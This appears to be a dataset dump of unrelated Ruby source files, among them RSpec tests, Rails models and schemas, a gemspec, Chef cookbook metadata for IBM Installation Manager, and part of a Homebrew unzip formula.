record.valid?.should be_false
end
end
context "validates that the attribute has the exact number of values" do
    # A separate class so this context's :is validation does not stack onto TestJsonSize above.
    class TestJsonSizeExact < HarvesterCore::Json::Base
attribute :landing_url, path: "landing_url"
validates :landing_url, size: { is: 1 }
end
it "should be valid when it has one value" do
      record = TestJsonSizeExact.new({"landing_url" => ["http://google.com/1"]})
record.set_attribute_values
record.valid?.should be_true
end
it "should not be valid when it has 0 values" do
      record = TestJsonSizeExact.new({"landing_url" => []})
record.set_attribute_values
record.valid?.should be_false
end
it "should not be valid when it has 2 values" do
      record = TestJsonSizeExact.new({"landing_url" => ["http://google.com/1", "http://google.com/2"]})
record.set_attribute_values
record.valid?.should be_false
end
end
end
| 33.08 | 121 | 0.673519 |
117f48450e2a78bbcc9b2791836c728f27954b8b | 6,363 | require 'spec_helper'
describe 'projects/jobs/show' do
let(:project) { create(:project, :repository) }
let(:build) { create(:ci_build, pipeline: pipeline) }
let(:pipeline) do
create(:ci_pipeline, project: project, sha: project.commit.id)
end
before do
assign(:build, build.present)
assign(:project, project)
allow(view).to receive(:can?).and_return(true)
end
describe 'environment info in job view' do
context 'job with latest deployment' do
let(:build) do
create(:ci_build, :success, environment: 'staging')
end
before do
create(:environment, name: 'staging')
create(:deployment, deployable: build)
end
it 'shows deployment message' do
expected_text = 'This job is the most recent deployment'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
end
context 'job with outdated deployment' do
let(:build) do
create(:ci_build, :success, environment: 'staging', pipeline: pipeline)
end
let(:second_build) do
create(:ci_build, :success, environment: 'staging', pipeline: pipeline)
end
let(:environment) do
create(:environment, name: 'staging', project: project)
end
let!(:first_deployment) do
create(:deployment, environment: environment, deployable: build)
end
let!(:second_deployment) do
create(:deployment, environment: environment, deployable: second_build)
end
it 'shows deployment message' do
expected_text = 'This job is an out-of-date deployment ' \
"to staging.\nView the most recent deployment ##{second_deployment.iid}."
render
expect(rendered).to have_css('.environment-information', text: expected_text)
end
end
context 'job failed to deploy' do
let(:build) do
create(:ci_build, :failed, environment: 'staging', pipeline: pipeline)
end
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'The deployment of this job to staging did not succeed.'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
end
context 'job will deploy' do
let(:build) do
create(:ci_build, :running, environment: 'staging', pipeline: pipeline)
end
context 'when environment exists' do
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
context 'when it has deployment' do
let!(:deployment) do
create(:deployment, environment: environment)
end
it 'shows that deployment will be overwritten' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
expect(rendered).to have_css(
'.environment-information', text: 'latest deployment')
end
end
end
context 'when environment does not exist' do
it 'shows deployment message' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
expect(rendered).not_to have_css(
'.environment-information', text: 'latest deployment')
end
end
end
context 'job that failed to deploy and environment has not been created' do
let(:build) do
create(:ci_build, :failed, environment: 'staging', pipeline: pipeline)
end
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'The deployment of this job to staging did not succeed'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
end
end
context 'job that will deploy and environment has not been created' do
let(:build) do
create(:ci_build, :running, environment: 'staging', pipeline: pipeline)
end
let!(:environment) do
create(:environment, name: 'staging', project: project)
end
it 'shows deployment message' do
expected_text = 'This job is creating a deployment to staging'
render
expect(rendered).to have_css(
'.environment-information', text: expected_text)
expect(rendered).not_to have_css(
'.environment-information', text: 'latest deployment')
end
end
end
context 'when job is running' do
before do
build.run!
render
end
it 'does not show retry button' do
expect(rendered).not_to have_link('Retry')
end
it 'does not show New issue button' do
expect(rendered).not_to have_link('New issue')
end
end
describe 'commit title in sidebar' do
let(:commit_title) { project.commit.title }
it 'shows commit title and not show commit message' do
render
expect(rendered).to have_css('p.build-light-text.append-bottom-0',
text: /\A\n#{Regexp.escape(commit_title)}\n\Z/)
end
end
describe 'shows trigger variables in sidebar' do
let(:trigger_request) { create(:ci_trigger_request_with_variables, pipeline: pipeline) }
before do
build.trigger_request = trigger_request
render
end
it 'shows trigger variables in separate lines' do
expect(rendered).to have_css('.js-build-variable', visible: false, text: 'TRIGGER_KEY_1')
expect(rendered).to have_css('.js-build-variable', visible: false, text: 'TRIGGER_KEY_2')
expect(rendered).to have_css('.js-build-value', visible: false, text: 'TRIGGER_VALUE_1')
expect(rendered).to have_css('.js-build-value', visible: false, text: 'TRIGGER_VALUE_2')
end
end
end
| 29.595349 | 95 | 0.636649 |
21d04292246da3115b4e3f78d378fa7528753dd8 | 517 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventGrid::Mgmt::V2017_09_15_preview
module Models
#
# Defines values for TopicTypeProvisioningState
#
module TopicTypeProvisioningState
Creating = "Creating"
Updating = "Updating"
Deleting = "Deleting"
Succeeded = "Succeeded"
Canceled = "Canceled"
Failed = "Failed"
end
end
end
| 24.619048 | 70 | 0.690522 |
bfecbd85f220a67de6d48ea267da7214039c6a28 | 3,103 | # == Schema Information
#
# Table name: research_journal_articles
#
# id :uuid not null, primary key
# abstract :text
# keywords :text
# old_text :text
# position :integer
# published :boolean default(FALSE)
# published_at :date
# references :text
# slug :string
# title :string
# created_at :datetime not null
# updated_at :datetime not null
# research_journal_id :uuid not null
# research_journal_volume_id :uuid
# university_id :uuid not null
# updated_by_id :uuid
#
# Indexes
#
# index_research_journal_articles_on_research_journal_id (research_journal_id)
# index_research_journal_articles_on_research_journal_volume_id (research_journal_volume_id)
# index_research_journal_articles_on_university_id (university_id)
# index_research_journal_articles_on_updated_by_id (updated_by_id)
#
# Foreign Keys
#
# fk_rails_... (research_journal_id => research_journals.id)
# fk_rails_... (research_journal_volume_id => research_journal_volumes.id)
# fk_rails_... (university_id => universities.id)
# fk_rails_... (updated_by_id => users.id)
#
class Research::Journal::Article < ApplicationRecord
include WithGit
include WithBlobs
include WithPosition
has_rich_text :text
has_one_attached :pdf
belongs_to :university
belongs_to :journal, foreign_key: :research_journal_id
belongs_to :volume, foreign_key: :research_journal_volume_id, optional: true
belongs_to :updated_by, class_name: 'User'
has_and_belongs_to_many :persons,
class_name: 'University::Person',
join_table: :research_journal_articles_researchers,
association_foreign_key: :researcher_id
has_many :websites, -> { distinct }, through: :journal
validates :title, presence: true
before_validation :set_published_at, if: :published_changed?
scope :published, -> { where(published: true) }
def git_path(website)
"content/articles/#{published_at.year}/#{published_at.strftime "%Y-%m-%d"}-#{slug}.html" if (volume.nil? || volume.published_at) && published_at
end
def git_dependencies(website)
[self] +
active_storage_blobs +
other_articles_in_the_volume +
persons +
persons.map(&:researcher)
end
def to_s
"#{ title }"
end
def path
"/#{slug}"
end
protected
def other_articles_in_the_volume
return [] if volume.nil?
volume.articles.where.not(id: self)
end
def last_ordered_element
Research::Journal::Article.where(
university_id: university_id,
research_journal_volume_id: research_journal_volume_id
).ordered.last
end
def explicit_blob_ids
super.concat [pdf&.blob_id]
end
def set_published_at
self.published_at = published? ? Time.zone.now : nil
end
end
| 30.421569 | 148 | 0.647438 |
d5e4d3601469c41a8a4b6d57c5182e4ae700ee2c | 2,830 | if ENV['CI']
require 'simplecov'
SimpleCov.start
end
# This file is copied to spec/ when you run 'rails generate rspec:install'
ENV['RAILS_ENV'] ||= 'test'
require File.expand_path('../../config/environment', __FILE__)
require 'spec_helper'
# Prevent database truncation if the environment is production
abort("The Rails environment is running in production mode!") if Rails.env.production?
require 'rspec/rails'
# Add additional requires below this line. Rails is not loaded until this point!
# Requires supporting ruby files with custom matchers and macros, etc, in
# spec/support/ and its subdirectories. Files matching `spec/**/*_spec.rb` are
# run as spec files by default. This means that files in spec/support that end
# in _spec.rb will both be required and run as specs, causing the specs to be
# run twice. It is recommended that you do not name files matching this glob to
# end with _spec.rb. You can configure this pattern with the --pattern
# option on the command line or in ~/.rspec, .rspec or `.rspec-local`.
#
# The following line is provided for convenience purposes. It has the downside
# of increasing the boot-up time by auto-requiring all files in the support
# directory. Alternatively, in the individual `*_spec.rb` files, manually
# require only the support files necessary.
#
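# For example ("my_helper" below is a hypothetical support file):
#
#   require Rails.root.join("spec", "support", "my_helper")
#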
Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each { |f| require f }
# Checks for pending migrations and applies them before tests are run.
# If you are not using ActiveRecord, you can remove these lines.
begin
ActiveRecord::Migration.maintain_test_schema!
rescue ActiveRecord::PendingMigrationError => e
puts e.to_s.strip
exit 1
end
RSpec.configure do |config|
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# RSpec Rails can automatically mix in different behaviours to your tests
# based on their file location, for example enabling you to call `get` and
# `post` in specs under `spec/controllers`.
#
# You can disable this behaviour by removing the line below, and instead
# explicitly tag your specs with their type, e.g.:
#
# RSpec.describe UsersController, :type => :controller do
# # ...
# end
#
# The different available types are documented in the features, such as in
# https://relishapp.com/rspec/rspec-rails/docs
config.infer_spec_type_from_file_location!
# Filter lines from Rails gems in backtraces.
config.filter_rails_from_backtrace!
# arbitrary gems may also be filtered via:
# config.filter_gems_from_backtrace("gem name")
end
| 42.238806 | 86 | 0.748057 |
871c765d257b7d2977f14e157c87fbd7ff80d67d | 2,173 | =begin
#Selling Partner API for Catalog Items
#The Selling Partner API for Catalog Items provides programmatic access to information about items in the Amazon catalog. For more information, see the [Catalog Items API Use Case Guide](https://github.com/amzn/selling-partner-api-docs/blob/main/guides/en-US/use-case-guides/catalog-items-api-use-case-guide/catalog-items-api-use-case-guide_2020-12-01.md).
OpenAPI spec version: 2020-12-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AmzSpApi::CatalogItems_20201201::ItemImage
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'ItemImage' do
before do
# run before each test
@instance = AmzSpApi::CatalogItems_20201201::ItemImage.new
end
after do
# run after each test
end
describe 'test an instance of ItemImage' do
it 'should create an instance of ItemImage' do
expect(@instance).to be_instance_of(AmzSpApi::CatalogItems_20201201::ItemImage)
end
end
describe 'test attribute "variant"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
# validator = Petstore::EnumTest::EnumAttributeValidator.new('String', ["MAIN", "PT01", "PT02", "PT03", "PT04", "PT05", "PT06", "PT07", "PT08", "SWCH"])
# validator.allowable_values.each do |value|
# expect { @instance.variant = value }.not_to raise_error
# end
end
end
describe 'test attribute "link"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "height"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "width"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 34.492063 | 357 | 0.724344 |
5df7ef0eaefb392adb3961f315cc2e4154ec6d08 | 602 | module JavaPackageModuleTemplate
class << self
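    # Unknown constants under this package are resolved lazily as Java proxy classes.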
def const_missing(const)
JavaUtilities.get_proxy_class(@package_name + const.to_s)
end
private :const_missing
def method_missing(sym, *args)
Kernel.raise ArgumentError, "Java package `#{package_name}' does not have a method `#{sym}'" unless args.empty?
JavaUtilities.get_proxy_or_package_under_package self, sym
end
private :method_missing
def package_name
# strip off trailing .
@package_name[0..-2]
end
end
end
# pull in the default package
JavaUtilities.get_package_module("Default")
| 27.363636 | 117 | 0.719269 |
d59332b4529e8b974230ab27ec25983e88344b6f | 426 | class Student
attr_reader :grade,
:grades
def initialize
@grades = ["A", "B", "C", "D", "F"]
    @grade = @grades[2]
  end
  # Studying improves the grade by one step (toward "A"), unless it is already the top grade.
  def study
    index = @grades.index(@grade)
    @grade = @grades[index - 1] unless index == 0
  end
  # Slacking off lowers the grade by one step (toward "F"), unless it is already the bottom grade.
  def slack_off
    index = @grades.index(@grade)
    @grade = @grades[index + 1] unless index == 4
  end
end
| 15.777778 | 39 | 0.516432 |
01d8e93cd6e31b64743318097049f2e7d00f3240 | 1,029 | $:.push File.expand_path('../lib', __FILE__)
require 'screen-object/version'
Gem::Specification.new do |s|
s.name = 'screen-object'
s.version = ScreenObject::VERSION
s.platform = Gem::Platform::RUBY
s.authors = ['Sreepad Bhagwat','Shailendra Jain']
s.license = 'APACHE 2.0'
s.homepage = 'https://github.com/capitalone/screen-object'
  s.summary      = 'Page Object like DSL for testing mobile applications'
  s.description  = 'Page Object like DSL for testing mobile applications'
s.files = `git ls-files | grep -v sample_app`.split("\n")
s.test_files = `git ls-files -- {spec,features}/*`.split("\n")
s.executables = `git ls-files -- bin/*`.split("\n").map { |f| File.basename(f) }
s.require_paths = ['lib']
s.add_runtime_dependency 'appium_lib', '~> 9.11.1', '>= 9.11.1'
s.add_runtime_dependency 'page_navigation', '~> 0.9'
s.add_runtime_dependency 'childprocess', '~> 0.5'
s.add_development_dependency 'cucumber', '~> 1.3', '>= 1.3.0'
s.add_development_dependency 'rspec', '~> 3.1', '>= 3.1.0'
end
| 36.75 | 82 | 0.670554 |
ffc2b8f9564967bf11db603e0ce29e1ba9894f6e | 366 | module Neo4j::Driver
module Internal
module Messaging
module Encode
class PullAllMessageEncoder
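          # Encodes a Bolt PULL_ALL request: validates the message type, then writes an
          # empty struct (zero fields) tagged with PullAllMessage::SIGNATURE.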
def encode(message, packer)
Util::Preconditions.check_argument(message, Request::PullAllMessage)
packer.pack_struct_header(0, Request::PullAllMessage::SIGNATURE)
end
end
end
end
end
end
| 24.4 | 80 | 0.650273 |
e2192dbe94ea4057dfccf676308edae14ec76ca1 | 1,106 | require File.join(File.expand_path(File.dirname(__FILE__)), '..', 'test_helper')
class ApiKeyTest < ActiveSupport::TestCase
test "should create API key" do
assert_difference 'ApiKey.count' do
create_api_key
end
end
test "should generate expiration date" do
t = Time.parse('2015-01-01 09:00:00')
Time.stubs(:now).returns(t)
k = create_api_key
Time.unstub(:now)
assert_equal Time.parse('2015-01-31 09:00:00'), k.reload.expire_at
end
test "should generate access token" do
k = create_api_key
assert_kind_of String, k.reload.access_token
end
test "should generate random data" do
assert_kind_of String, random_string
assert_kind_of Integer, random_number
assert_kind_of String, random_email
end
test "should have application" do
ApiKey.stubs(:applications).returns([nil, 'test'])
k1 = create_api_key
assert_nil k1.application
k2 = create_api_key application: 'test'
assert_equal 'test', k2.application
assert_raises ActiveRecord::RecordInvalid do
create_api_key application: 'invalid'
end
end
end
| 27.65 | 80 | 0.717902 |
1c29feb65fbecc0570c5abc25959eab4d07a176a | 1,109 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
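#
# For example, with a standard Rails setup:
#
#   bin/rails db:schema:load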
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20200521045514) do
create_table "brews", force: :cascade do |t|
t.string "brewery"
t.string "beer_name"
t.string "package_date"
t.string "abv"
t.integer "user_id"
end
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password_digest"
end
end
| 35.774194 | 86 | 0.746619 |
d5c77e40a4cc534e6ad61d0907f894d4402fe67f | 13,859 | name 'im'
maintainer 'IBM Corp'
maintainer_email ''
license 'Copyright IBM Corp. 2016, 2017'
provides 'im'
depends 'ibm_cloud_utils'
supports 'rhel', '>= 7.0'
supports 'ubuntu', '>= 14.04'
description <<-EOH
## DESCRIPTION
This cookbook provides a lightweight resource/provider (LWRP) that can be used to install IBM Installation Manager (IM) and IBM products using the IBM Installation Manager.
## Versions
* IBM IM V1.8.5, V1.8.6
## Use Cases
* IM installation
* IM upgrade to the latest IM version included in IM repository.
* Installation of any package included in IM repository (IHS - com.ibm.websphere.IHS.v85_8.5.5009.20160225_0435.jar ; WAS ND - com.ibm.websphere.ND.v85_8.5.5009.20160225_0435.jar; etc.)
## Platform Pre-Requisites
* Linux YUM Repository - An onsite Linux YUM repository is required.
## Software Repository
SW_REPO_ROOT -> Stored in the ['ibm']['sw_repo'] attribute.
## IM Package Repository
IM_REPO -> Stored in the ['ibm']['im_repo'] attribute.
Relative to the software repository, the installation files must be stored in the following location.
* BASE FILES -> /im/v1x/base/
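For illustration only, a minimal sketch of pointing these attributes at your own repository from a wrapper cookbook's attributes file (the URL and paths below are placeholders, not values shipped with this cookbook):
```ruby
# Hypothetical wrapper-cookbook attributes/default.rb -- URL and paths are placeholders
default['ibm']['sw_repo'] = 'http://repo.example.com:8888/software'
# IM base installer archives are expected under <SW_REPO_ROOT>/im/v1x/base/
default['ibm']['im_repo'] = 'http://repo.example.com:8888/IMRepo'
```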
The following is a description of files needed on the REPO Server depending on version and architecture.
```ruby
case node['platform_family']
when 'rhel', 'debian'
case node['kernel']['machine']
when 'x86_64'
default['im']['arch'] = 'x86_64'
# <> Installation Manager Version 1.8.5, 1.8.6
force_override['im']['archive_names'] =
{ '1.8.5' => { 'filename' => 'agent.installer.linux.gtk.' + node['im']['arch'] + '_1.8.5000.20160506_1125.zip',
'sha256' => '76190adf69f6e4a6a8d7432983f5aebe68d56545a3a13b3ecd6b25c12d433b04' },
'1.8.6' => { 'filename' => 'agent.installer.linux.gtk.' + node['im']['arch'] + '_1.8.6000.20161118_1611.zip',
'sha256' => 'b253a06bccace5934b108632487182f6a6f659082fea69372242b9865a64e4f3' } }
end
```
# Resources
* [im_install] - Installs IBM Installation Manager. Installs an IBM product by executing the IBM Installation manager.
## im_install
Installs IBM Installation Manager. Installs an IBM product by executing the IBM Installation manager.
### Actions
- install_im: Installs IBM Installation Manager.
- upgrade_im: Installs the latest fixpack available in IM Repository for IBM Installation Manager.
- install: Default action. Installs an IBM product by executing the IBM Installation manager.
### Attribute Parameters
<table>
<tr>
<td>LWRP Attribute</td>
<td>Description</td>
<td>Default</td>
</tr>
<tr>
<td><code>repositories</code></td>
<td>The IM repository.</td>
<td><code>node['ibm']['im_repo']</code></td>
</tr>
<tr>
<td><code>secure_repo</code></td>
<td>If the IM repo is public this should be set to "false"</td>
<td><code>'true'</code></td>
</tr>
<tr>
<td><code>im_repo_user</code></td>
  <td>User used to access the IM repo if the repo is secured and authentication is required. This is not required if the IM repo is not secured.</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>im_repo_nonsecureMode</code></td>
<td>If the IM repo is secured but it uses a self signed SSL certificate this should be set to "true"</td>
<td><code>'false'</code></td>
</tr>
<tr>
<td><code>repo_nonsecureMode</code></td>
<td>If the Software repo is secured but it uses a self signed SSL certificate this should be set to "true"</td>
<td><code>'false'</code></td>
</tr>
<tr>
<td><code>response_file</code></td>
<td>The response file for the IBM Installation Manager.</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>install_dir</code></td>
<td>Installation directory for the product that is installed using this LWRP</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>offering_id</code></td>
<td>Offering ID. You can find the value in your IMRepo. Each Product has a different ID (e.g. com.ibm.websphere.IHS.v85, com.ibm.websphere.PLG.v85, com.ibm.websphere.ND.v85 )</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>java_offering_id</code></td>
<td>Java offering ID. You can find the value in your IMRepo. Each Product has a different ID</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>offering_version</code></td>
<td>Offering version. You can find the value in your IMRepo. Each Product has a different offering version</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>java_offering_version</code></td>
<td>Java offering version. You can find the value in your IMRepo. Each Product has a different offering version</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>profile_id</code></td>
<td>Profile ID. This is a short description of the product</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>feature_list</code></td>
<td>Feature list for the product. This is a list of components that should be installed for a specific product</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>java_feature_list</code></td>
<td>Java feature list for the product. This is a list of components that should be installed for a specific product</td>
<td><code>nil</code></td>
</tr>
<tr>
<td><code>install_java</code></td>
<td>Flag for Java Installation. Supports "true" or "false"</td>
<td><code>'false'</code></td>
</tr>
<tr>
<td><code>im_shared_dir</code></td>
<td>Directory where installation artifacts are stored.</td>
<td><code>'/opt/IBM/IMShared'</code></td>
</tr>
<tr>
<td><code>user</code></td>
<td>User used to install IM and that should be used to install a product. It should be created before calling im_install LWRP</td>
<td><code>'root'</code></td>
</tr>
<tr>
<td><code>group</code></td>
<td>Group used to install IM and that should be used to install a product. It should be created before calling im_install LWRP</td>
<td><code>'root'</code></td>
</tr>
<tr>
<td><code>im_install_mode</code></td>
<td>Installation mode used to install IM and that should be used to install a product. Supports "admin", "nonAdmin" or "group"</td>
<td><code>'admin'</code></td>
</tr>
<tr>
<td><code>im_install_dir</code></td>
<td>Directory where im will be installed</td>
<td><code>'/opt/IBM/InstallationManager'</code></td>
</tr>
<tr>
<td><code>log_dir</code></td>
<td>An absolute path to a directory that will be used to hold any persistent files created as part of the automation</td>
<td><code>'node['ibm']['evidence_path']'</code></td>
</tr>
<tr>
<td><code>version</code></td>
<td>Installation Manager Version Number to be installed. Supported versions: 1.8.5, 1.8.6</td>
<td><code>node['im']['version']</code></td>
</tr>
<tr>
<td><code>im_data_dir</code></td>
<td>Installation Manager Data Directory</td>
<td><code>'/var/ibm/InstallationManager'</code></td>
</tr>
</table>
### Examples
Installing IM and IHS from a public IM repository using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "http://<hostname>:<port>/<path>"
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing a specific version of IM and IHS from a public IM repository using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "http://<hostname>:<port>/<path>"
version '1.8.6'
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing IM and IHS from a password protected repository using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "https://<hostname>:<port>/<path>"
im_repo_user '<im repo username>'
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing IM and IHS from a password protected repository (both using a self signed certificate) using admin installation mode
```ruby
im_install "com.ibm.websphere.IHS.v85" do
repositories "https://<hostname>:<port>/<path>"
im_repo_user '<im repo username>'
im_repo_nonsecureMode 'true'
repo_nonsecureMode 'true'
install_dir '/opt/IBM/HTTPServer'
response_file "IHSv85.install.xml"
offering_id 'com.ibm.websphere.IHS.v85'
offering_version '8.5.5008.20151112_0939'
profile_id "IBM HTTP Server for WebSphere Application Server V8.5"
feature_list "core.feature,arch.64bit"
im_install_mode 'admin'
action [:install_im, :upgrade_im, :install]
end
```
Installing WASND and Java from a password protected repository (IM repo using a self signed certificate) using nonAdmin installation mode. Assuming that IM is already installed.
```ruby
im_install "com.ibm.websphere.ND.v85" do
repositories "https://<hostname>:<port>/<path>"
im_repo_user '<im repo username>'
im_repo_nonsecureMode 'true'
  install_dir '/home/wasadmin/opt/IBM/WebSphere/AppServer'
response_file "WASv85.install.xml"
offering_id "com.ibm.websphere.ND.v85"
offering_version '8.5.5008.20151112_0939'
profile_id "IBM WebSphere Application Server V8.5"
feature_list "core.feature,ejbdeploy,thinclient,embeddablecontainer,com.ibm.sdk.6_64bit"
install_java "true"
java_feature_list "com.ibm.sdk.7"
java_offering_id "com.ibm.websphere.IBMJAVA.v70"
java_offering_version "7.0.9030.20160224_1826"
im_install_mode 'nonAdmin'
user 'wasadmin'
group 'wasgroup'
action [:install]
end
```
Response file template:
```ruby
<?xml version="1.0" encoding="UTF-8"?>
<!-- ##### Copyright ######################################################
# Licensed Materials - Property of IBM (c) Copyright IBM Corp. 2012.
# All Rights Reserved. US Government Users Restricted Rights-Use, duplication
# or disclosure restricted by GSA ADP Schedule Contract with IBM Corp.
####################################################################### -->
<agent-input clean="true" temporary="true">
<server>
<repository location='<%= @REPO_LOCATION %>' />
</server>
<install modify='false'>
<offering id='<%= @OFFERING_ID %>' version='<%= @OFFERING_VERSION %>' profile='<%= @PROFILE_ID %>' features='<%= @FEATURE_LIST %>' installFixes='none'/>
<% if @INSTALL_JAVA == "true" %>
<offering id='<%= @JAVA_OFFERING_ID %>' version='<%= @JAVA_OFFERING_VERSION %>' profile='<%= @PROFILE_ID %>' features='<%= @JAVA_FEATURE_LIST %>' installFixes='none'/>
<% end %>
</install>
<profile id='<%= @PROFILE_ID %>' installLocation='<%= @INSTALL_LOCATION %>'>
<data key='eclipseLocation' value='<%= @INSTALL_LOCATION %>'/>
<data key='user.import.profile' value='false'/>
<data key='cic.selector.nl' value='en'/>
<% if @OFFERING_ID.include? "IHS" %>
<data key='user.ihs.httpPort' value='<%= node['ihs']['port'] %>'/>
<data key='user.ihs.allowNonRootSilentInstall' value='true'/>
<% end %>
</profile>
<preference name='com.ibm.cic.common.core.preferences.connectTimeout' value='30'/>
<preference name='com.ibm.cic.common.core.preferences.readTimeout' value='45'/>
<preference name='com.ibm.cic.common.core.preferences.downloadAutoRetryCount' value='0'/>
<preference name='offering.service.repositories.areUsed' value='false'/>
<preference name='com.ibm.cic.common.core.preferences.ssl.nonsecureMode' value='<%= @IM_REPO_NONSECUREMODE %>'/>
<preference name='com.ibm.cic.common.core.preferences.http.disablePreemptiveAuthentication' value='false'/>
<preference name='http.ntlm.auth.kind' value='NTLM'/>
<preference name='http.ntlm.auth.enableIntegrated.win32' value='true'/>
<preference name='com.ibm.cic.common.core.preferences.keepFetchedFiles' value='false'/>
<preference name='PassportAdvantageIsEnabled' value='false'/> <%# ~password_checker %>
<preference name='com.ibm.cic.common.core.preferences.searchForUpdates' value='false'/>
<preference name='com.ibm.cic.agent.ui.displayInternalVersion' value='false'/>
<preference name='com.ibm.cic.common.core.preferences.eclipseCache' value='<%= @IMSHARED %>'/>
```
EOH
version '1.0.2'
recipe 'im::cleanup.rb', '
Cleanup recipe (cleanup.rb)
This recipe will delete the temp directory where installers were copied, as they are not required any further.
'
recipe 'im::default.rb', '
Default recipe (default.rb)
The default recipe for the cookbook. It is recommended to not use the default recipe, but explicitly specify a run_list for the deployment node.
'
recipe 'im::environment_check.rb', '
environment_check recipe (environment_check.rb)
This recipe will test that the external environment is ready to have the cookbook installed.
'
recipe 'im::fixpack.rb', '
Fixpack recipe (fixpack.rb)
This recipe performs product fixpack installation.
'
recipe 'im::gather_evidence.rb', '
Gather evidence recipe (gather_evidence.rb)
It will create a log file mentioning the installed application version.
'
recipe 'im::install.rb', '
Install recipe (install.rb)
Installation recipe: sources the version, unpacks the file and installs the product.
'
recipe 'im::prereq.rb', '
Prerequisites recipe (prereq.rb)
This recipe configures the operating prerequisites for the pattern.
'
| 42.12462 | 185 | 0.699978 |
910dc240e4c100ec91b4a8fc5b842488548f1285 | 3,476 | class Unzip < Formula
desc "Extraction utility for .zip compressed archives"
homepage "https://infozip.sourceforge.io/UnZip.html"
url "https://downloads.sourceforge.net/project/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/unzip60.tar.gz"
version "6.0"
sha256 "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
revision 6
livecheck do
url :stable
regex(%r{url=.*?(?:%20)?v?(\d+(?:\.\d+)+)/unzip\d+\.t}i)
end
bottle do
cellar :any_skip_relocation
sha256 "178cea56554b0e6b74856203340554c7615c6ed2e122059c78370e35c896f0ce" => :catalina
sha256 "f0b95f2d5c664f45686f3aa318384906014ed28939da28020d12138f025aaeb6" => :mojave
sha256 "6dd7d0862f5a8b954dd94b3c91378209e0086eec7c5be367af0d8c330bc099da" => :high_sierra
sha256 "f4d59c04a44f93a30a23ec403784c73f9c06db9b72f3277679f66b1870a94331" => :sierra
end
keg_only :provided_by_macos
uses_from_macos "bzip2"
# Upstream is unmaintained so we use the Debian patchset:
# https://packages.debian.org/buster/unzip
patch do
url "https://deb.debian.org/debian/pool/main/u/unzip/unzip_6.0-25.debian.tar.xz"
sha256 "0783e4d11d755cb43904e3f59a60dbb92ee9c6b08ac54d86bc61f9848216f37b"
apply %w[
patches/01-manpages-in-section-1-not-in-section-1l.patch
patches/02-this-is-debian-unzip.patch
patches/03-include-unistd-for-kfreebsd.patch
patches/04-handle-pkware-verification-bit.patch
patches/05-fix-uid-gid-handling.patch
